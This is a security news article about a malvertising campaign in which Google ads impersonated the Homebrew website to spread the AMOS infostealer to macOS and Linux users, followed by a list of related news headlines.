Fake Homebrew Infects macOS and Linux Machines with infostealer

📟 News

Date: 22/01/2025

Attackers use Google ads to disguise themselves as the Homebrew website and distribute malware targeting Mac and Linux systems and stealing logon credentials, browser data, and cryptocurrency wallets.

The first to discover malicious Google ads was security researcher Ryan Chenkie. According to Bleeping Computer, the malware used in this campaign is AmosStealer (aka Atomic). This infostealer is designed for systems running macOS and is available as a subscription ($1,000 per month).

In the past, this malware was spotted in other malvertising campaigns promoting fake Google Meet pages. According to researchers, AmosStealer is currently the main infostealer for hackers targeting Apple users.

Homebrew is a third-party package manager for macOS and Linux whose popularity is being exploited by criminals. Malvertisements spotted on Google displayed the correct URL brew.sh, which misled even users familiar with the project. However, these ads actually redirected victims to a fake Homebrew website located at brewe[.]sh.

Malicious ad (source: @ryanchenkie)
Malicious ad (source: @ryanchenkie)

It must be noted that malefactors have been using this tactics (i.e. displaying trusted URLs in their ads to trick users into visiting supposedly official sites) for a long time. Earlier, experts found similar malicious ads disguised as Google Authenticator and Google Ads.

In the new malware campaign, the potential victim goes to a fake website and is prompted to install Homebrew by pasting a command shown in the macOS Terminal or a Linux shell prompt. Importantly, the real Homebrew website prompts the user to execute a similar command to install legitimate software. But after executing the command on the fake website, the Amos infostealer is downloaded to the user’s device; this malware targets over 50 cryptocurrency extensions, desktop wallets (including Binance, Coinomi, Electrum, and Exodus), and data stored on web browsers.

Fake website (source: @ryanchenkie)
Fake website (source: @ryanchenkie)

Homebrew’s project leader, Mike McQuaid, told journalists that the Homebrew developers are aware of the situation, but emphasized that it’s beyond their control, criticizing Google for its lack of scrutiny.

There’s little we can do about this really, it keeps happening again and again and Google seems to like taking money from scammers. Please signal-boost this and hopefully someone at Google will fix this for good”, – McQuaid said.

Related posts:
2025.02.14 — 12,000 Kerio Control firewalls remain vulnerable to RCE

Security experts report that more than 12,000 GFI Kerio Control firewall instances remain vulnerable to the critical RCE vulnerability CVE-2024-52875, which was fixed…

Full article →
2025.02.09 — Abandoned AWS S3 buckets could be used in attacks targeting supply chains

watchTowr discovered plenty of abandoned Amazon S3 buckets that could be used by attackers to deliver malware and backdoors to government agencies and large corporations. The researchers discovered…

Full article →
2025.02.06 — Let's Encrypt to stop sending expiration notification emails

The nonprofit organization announced that, starting June 4, 2025, it will stop sending expiration notification emails to subscribers. The primary reason behind this decision…

Full article →
2025.01.29 — Google to disable Sync in older Chrome versions

Google announced that in early 2025, Chrome Sync will be disabled in Chrome versions older than four years. Chrome Sync enables users to save and sync their…

Full article →
2025.04.04 — Privilege escalation vulnerability in Google Cloud resulting in sensitive data leaks finally patched

Tenable Research revealed details of a recently patched privilege escalation vulnerability in Google Cloud Platform (GCP) Cloud Run enabling an attacker to gain access to container images…

Full article →
2025.02.08 — Hackers exploit RCE vulnerability in Microsoft Outlook

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned Federal Civilian Executive Branch (FCEB) Agencies that they have to secure their systems from ongoing…

Full article →
2025.01.27 — YouTube plays hour-long ads to users with ad blockers

Users complain that YouTube plays very long unskippable ads. Sometimes such ads are longer than the video the person is watching. The issue was raised…

Full article →
2025.01.23 — Fake Telegram CAPTCHA forces users to run malicious PowerShell scripts

Hackers used the news of Ross Ulbricht pardoning to lure users to a rogue Telegram channel where they are tricked into running malicious PowerShell code. This…

Full article →
2025.02.21 — Microsoft fixes vulnerability in Power Pages exploited by cybercriminals

Microsoft patched a severe privilege escalation vulnerability in Power Pages used by hackers as a 0-day. The vulnerability tracked as CVE-2025-24989 (CVSS score 8.2) pertains…

Full article →
2025.01.25 — 18,000 script kiddies have been infected with backdoor via XWorm RAT builder

According to CloudSEK analysts, malefactors attack novice hackers using a fake malware builder. Script kiddies' systems become infected with a backdoor that steals data and subsequently…

Full article →